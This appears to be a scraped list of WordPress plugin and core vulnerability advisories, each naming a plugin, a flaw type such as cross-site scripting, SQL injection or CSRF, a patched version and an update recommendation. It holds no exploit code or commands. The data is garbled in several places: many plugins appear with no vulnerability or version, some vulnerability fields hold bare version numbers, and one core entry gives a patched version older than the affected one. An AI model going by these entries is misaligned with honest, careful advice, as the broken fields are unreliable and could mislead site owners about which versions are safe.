Recommended Action: Update to version 9.7.2, or a newer patched version

Plugin: Easy Panorama

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Reservation.Studio widget

Vulnerability: Cross-Site Request Forgery via plugin settings
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.6
Recommended Action: Update to version 2.6.6, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: 1.4.96
Recommended Action: Update to version 1.4.96, or a newer patched version

Plugin: WPBakery Page Builder for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.13.0
Recommended Action: Update to version 6.13.0, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 1.5.1.2
Recommended Action: Update to version 1.5.1.2, or a newer patched version

Plugin: SearchAutocomplete

Vulnerability: SQL Injection
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: AnyComment

Vulnerability: Open Redirect via redirect parameter
Patched Version: 0.3.5
Recommended Action: Update to version 0.3.5, or a newer patched version

Plugin: CURCY – Multi Currency for WooCommerce – The best free currency exchange plugin – Run smoothly on WooCommerce 8.x

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.18
Recommended Action: Update to version 2.1.18, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.5
Recommended Action: Update to version 4.2.5, or a newer patched version

Plugin: Flamingo

Vulnerability: CSV Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: WP Spell Check

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.13
Recommended Action: Update to version 9.13, or a newer patched version

Plugin: Better Font Awesome

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Avenir-soft Direct Download

Plugin: Tidio – Live Chat & AI Chatbots

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Most Popular Posts Widget

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 0.9
Recommended Action: Update to version 0.9, or a newer patched version

Plugin: Easyship WooCommerce Shipping Rates

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Plugin: Tinymce Thumbnail Gallery

Vulnerability: Local File Inclusion
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: BBSpoiler

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Login Security and History

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Block Editor
Patched Version: 3.7.32
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.32, 3.8.32, 3.9.30, 4.0.29, 4.1.29, 4.2.26, 4.3.22, 4.4.21, 4.5.20, 4.6.17, 4.7.16, 4.8.12, 4.9.13, 5.0.8, 5.1.4, 5.2.5, 5.3.1

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Open Redirect
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.19
Recommended Action: Update to version 1.3.19, or a newer patched version

Plugin: PixelYourSite – Your smart PIXEL (TAG) & API Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Internal Link Building

Plugin: Gallery Images Ape

Plugin: WP Basic Elements

Vulnerability: Cross-Site Request Forgery via wpbe_save_settings
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Multilanguage by BestWebSoft – WordPress Translation Plugin and Language Switcher

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Age Verify

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.2.9
Recommended Action: Update to version 0.2.9, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Order Message Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: SlideShare for WordPress by Yoast

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Simple Blog Card

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.31
Recommended Action: Update to version 1.31, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 14.0.0
Recommended Action: Update to version 14.0.0, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 5.5.2
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: LayerSlider

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: Guest Author

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: SQL Injection
Patched Version: 2.1.79
Recommended Action: Update to version 2.1.79, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Cross-Site Scripting
Patched Version: 1.14.1.3
Recommended Action: Update to version 1.14.1.3, or a newer patched version

Plugin: Progress Bar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via wppb shortcode
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: MainWP Dashboard: WordPress Management without the SaaS

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.4.3.4
Recommended Action: Update to version 4.4.3.4, or a newer patched version

Plugin: AddToAny Share Buttons

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.46
Recommended Action: Update to version 1.7.46, or a newer patched version

Plugin: Simple Membership

Vulnerability: Membership Privilege Escalation
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels

Vulnerability: Authenticated(Shop Manager+) Arbitrary Options Update via JSON Import
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Authenticated SQL Injection
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: RSVP and Event Management

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: BetterLinks – An Advanced Solution for Affiliate Link Management, Link Shortening, Link Tracking, Link Branding & Marketing

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Backup by Supsystic

Vulnerability: Cross-Site Request Forgery to Arbitrary File Download/Deletion
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: CRM Perks Forms – WordPress Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: MDC YouTube Downloader

Vulnerability: Directory Traversal
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Structured Content (JSON-LD) #wpsc

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Dynamics 365 Integration

Vulnerability: Cross-Site Request Forgery via wp_ajax_wpcrm_log
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Contributor+ Arbitrary File Download
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Custom Post Types and Custom Fields creator – WCK

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: 3D Product configurator for WooCommerce

Vulnerability: Arbitrary File Deletion
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Image URL
Patched Version: 2.5.5.3
Recommended Action: Update to version 2.5.5.3, or a newer patched version

Plugin: Ninja Popups

Plugin: Conditional cart fee / Extra charge rule for WooCommerce extra fees

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.97
Recommended Action: Update to version 1.0.97, or a newer patched version

Plugin: Related Posts for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Just Custom Fields

Vulnerability: Cross-Site Request Forgery on AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.6.0
Recommended Action: Update to version 6.6.0, or a newer patched version

Plugin: WP Social Bookmarking Light

Plugin: Donations Made Easy – Smart Donations

Plugin: Side Menu Lite – add sticky fixed buttons

Vulnerability: Cross-Site Request Forgery to Item Deletion
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: GTM4WP – A Google Tag Manager (GTM) plugin for WordPress

Vulnerability: Cross-Site Scripting via Cloudflare Country Code
Patched Version: 1.15.1
Recommended Action: Update to version 1.15.1, or a newer patched version

Plugin: Cookie Information | Free GDPR Consent Solution

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Slick Social Share Buttons

Vulnerability: Authenticated (Subscriber+) Arbitrary Option Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 5.3.5
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.61
Recommended Action: Update to version 2.9.61, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: SQL Injection
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: VDZ VERIFICATION (Custom Meta Tags)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Membership Plugin – Restrict Content

Vulnerability: Missing Authorization to Notice Dismissal
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Password Protected – Password Protect your WordPress Site, Pages, & WooCommerce Products – Restrict Content, Protect WooCommerce Category, and more

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Ultimate Dashboard – Custom WordPress Dashboard

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 3.7.8
Recommended Action: Update to version 3.7.8, or a newer patched version

Plugin: WP Remote Site Search

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Ibtana – WordPress Website Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.8.8
Recommended Action: Update to version 1.1.8.8, or a newer patched version

Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Arbitrary File Download
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Cookies and Content Security Policy

Vulnerability: Sensitive Information Exposure
Patched Version: 2.16
Recommended Action: Update to version 2.16, or a newer patched version

Core: WordPress MU

Vulnerability: Full Path Disclosure
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: WPDating

Vulnerability: Arbitrary File Upload
Patched Version: 7.4.2
Recommended Action: Update to version 7.4.2, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 5.8
Recommended Action: Update to version 5.8, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection via tutor_quiz_builder_get_question_form
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.43
Recommended Action: Update to version 3.2.43, or a newer patched version

Plugin: WP Mail Logging

Vulnerability: Unauthenticated Arbitrary Settings Change
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: ЮKassa для WooCommerce

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Information Disclosure
Patched Version: 13.2.6
Recommended Action: Update to version 13.2.6, or a newer patched version

Plugin: WP Glossary

Plugin: GD bbPress Attachments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Product Feed Manager- WooCommerce Product Feeds For Google Shopping, Social Catalog, TikTok Ads, and 180+ Popular Marketplaces

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 7.3.16
Recommended Action: Update to version 7.3.16, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Unauthenticated SQL Injection via email and trackingid
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Mingle Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.35
Recommended Action: Update to version 1.0.35, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Information Disclosure
Patched Version: 3.6.75
Recommended Action: Update to version 3.6.75, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Deletion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Delete Me

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: MDTF – Meta Data and Taxonomies Filter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Tiempo.com

Plugin: SimpleMap Store Locator

Plugin: BuddyPress Docs

Vulnerability: Authorization Bypass
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Custom Admin Page by BestWebSoft – Configurable WordPress Dashboard Pages Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.2
Recommended Action: Update to version 0.1.2, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Missing Authorization
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Unauthenticated Options update and CSS injection
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: FL3R FeelBox

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hotel Booking Lite

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Stamped.io Product Reviews & UGC for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: My Shortcodes

Vulnerability: Missing Authorization via Multiple AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: 2.6.1
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Recent Backups

Plugin: Math Comment Spam Protection

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: PHP Everywhere

Vulnerability: Remote Code Execution by Contributor+ users via gutenberg block
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Simple Membership

Vulnerability: Cross-Site Request Forgery to Arbitrary Transaction Deletion
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Spotlight Social Feeds – Block, Shortcode, and Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Core: WordPress

Vulnerability: No subtitle
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: WP Docs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WP-DBManager

Vulnerability: Command Injection
Patched Version: 2.72
Recommended Action: Update to version 2.72, or a newer patched version

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Alpine Photo Tile for Instagram

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.10
Recommended Action: Update to version 1.2.10, or a newer patched version

Plugin: JetTabs for Elementor

Vulnerability: Missing Authorization to Unauthenticated Unauthorized Action
Patched Version: 2.1.25.2
Recommended Action: Update to version 2.1.25.2, or a newer patched version

Plugin: Simple Schools Staff Directory

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login rebuilder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: FormBuilder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.08
Recommended Action: Update to version 1.08, or a newer patched version

Plugin: BBS e-Popup

Plugin: Analytics Stats Counter Statistics

Plugin: WPAdmin AWS CDN

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.25
Recommended Action: Update to version 2.0.25, or a newer patched version

Plugin: Five Star Restaurant Menu and Food Ordering

Vulnerability: Unauthenticated Arbitrary Object Deserialization leading to Remote Code Execution
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Export Media URLs

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: WP-TopBar

Plugin: Job Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.7.19
Recommended Action: Update to version 0.7.19, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.10.2
Recommended Action: Update to version 3.10.2, or a newer patched version

Core: WordPress MU

Vulnerability: Username Enumeration
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: KB Support – Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin

Vulnerability: Missing Authorization to Sensitive Data Exposure
Patched Version: 1.5.89
Recommended Action: Update to version 1.5.89, or a newer patched version

Plugin: WooCommerce

Vulnerability: Sensitive Information Exposure
Patched Version: 7.9.0
Recommended Action: Update to version 7.9.0, or a newer patched version

Plugin: Tradetracker-Store

Vulnerability: Authenticated SQL Injection
Patched Version: 4.6.60
Recommended Action: Update to version 4.6.60, or a newer patched version

Plugin: DethemeKit For Elementor

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.5.5.5
Recommended Action: Update to version 1.5.5.5, or a newer patched version

Plugin: Stripe Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Pz-LinkCard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.5.2
Recommended Action: Update to version 2.4.5.2, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: URL Shortify – Simple, Powerful and Easy URL Shortener Plugin For WordPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Referrer Header
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: WP Shamsi – افزونه تاریخ شمسی و فارسی ساز وردپرس

Vulnerability: Missing Authorization to Arbitrary Plugin Deactivation
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: WP Affiliate Platform

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: SQL Injection
Patched Version: 5.6.0
Recommended Action: Update to version 5.6.0, or a newer patched version

Plugin: Meta Box

Vulnerability: Mishandling of File Upload
Patched Version: 4.16.2
Recommended Action: Update to version 4.16.2, or a newer patched version

Plugin: Running Line

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Gutenberg Blocks for Post Grid <= 2.4.9
Patched Version: 2.4.10
Recommended Action: Update to version 2.4.10, or a newer patched version

Plugin: Clone

Vulnerability: Missing Authorization via wp_ajax_tifm_save_decision
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: audio-player

Vulnerability: Cross-Site Scripting via playerID Parameter
Patched Version: 2.0.4.6
Recommended Action: Update to version 2.0.4.6, or a newer patched version

Plugin: NewStatPress

Vulnerability: SQL Injection
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Database Backup for WordPress

Vulnerability: Missing Authorization
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Matterport Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: DX Delete Attached Media

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: 7.5.2.727
Patched Version: 7.5.3.727
Recommended Action: Update to version 7.5.3.727, or a newer patched version

Plugin: Nextend Social Login and Register

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Kadence WooCommerce Email Designer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.12
Recommended Action: Update to version 1.5.12, or a newer patched version

Core: WordPress

Vulnerability: 5.8
Patched Version: 5.4.7
Recommended Action: Update to one of the following versions, or a newer patched version: 5.4.7, 5.5.6, 5.6.5, 5.7.3, 5.8.1

Plugin: Welcart e-Commerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: Randomize

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Table Reloaded

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.4
Recommended Action: Update to version 1.9.4, or a newer patched version

Plugin: Mukioplayer For WordPress

Plugin: BadgeOS

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: 5.12.7
Recommended Action: Update to version 5.12.7, or a newer patched version

Plugin: wp-cal

Plugin: Eyes Only: User Access Shortcode

Plugin: Bootstrap Shortcodes

Plugin: Learning Courses

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: Advanced ads Management by Inazo

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.29
Recommended Action: Update to version 2.9.29, or a newer patched version

Plugin: Impreza – WordPress Website and WooCommerce Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.18
Recommended Action: Update to version 8.18, or a newer patched version

Plugin: Advanced WP Columns

Plugin: Pricing Table by Supsystic

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Insert or Embed Articulate Content into WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 4.2999
Recommended Action: Update to version 4.2999, or a newer patched version

Plugin: ZooEffect Plugin for Video player, Photo Gallery Slideshow jQuery and audio / music / podcast – HTML5

Plugin: Conditional Payment Methods for WooCommerce

Plugin: HappyFiles Pro

Vulnerability: Missing Authorization to Arbitrary File Deletion
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated SQL Injection via asc_or_desc Parameter
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: Smart External Link Click Monitor [Link Log]

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Plugin Settings Change
Patched Version: 1.0.64
Recommended Action: Update to version 1.0.64, or a newer patched version

Plugin: TK Google Fonts GDPR Compliant

Vulnerability: Authorization Bypass
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Booster Elite for WooCommerce

Vulnerability: Authenticated (Admin/Shop Manager+) Arbitrary File Download
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Quotes and Tips by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: JQuery Html5 File Upload

Vulnerability: Unauthenticated Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce

Vulnerability: Information Disclosure
Patched Version: 4.0.3
Recommended Action: Update to one of the following versions, or a newer patched version: 4.0.3, 4.1.3, 4.2.4, 4.3.5, 4.4.3, 4.5.4, 4.6.4, 4.7.3, 4.8.2, 4.9.4, 5.0.2, 5.1.2, 5.2.4, 5.3.2, 5.4.3, 5.5.3, 5.6.1, 5.7.0

Plugin: Infusionsoft Gravity Forms Add-on

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.12
Recommended Action: Update to version 1.5.12, or a newer patched version

Plugin: Comic Book Management System

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Login with Cognito

Vulnerability: Authentication Bypass
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: weForms – Easy Drag & Drop Contact Form Builder For WordPress

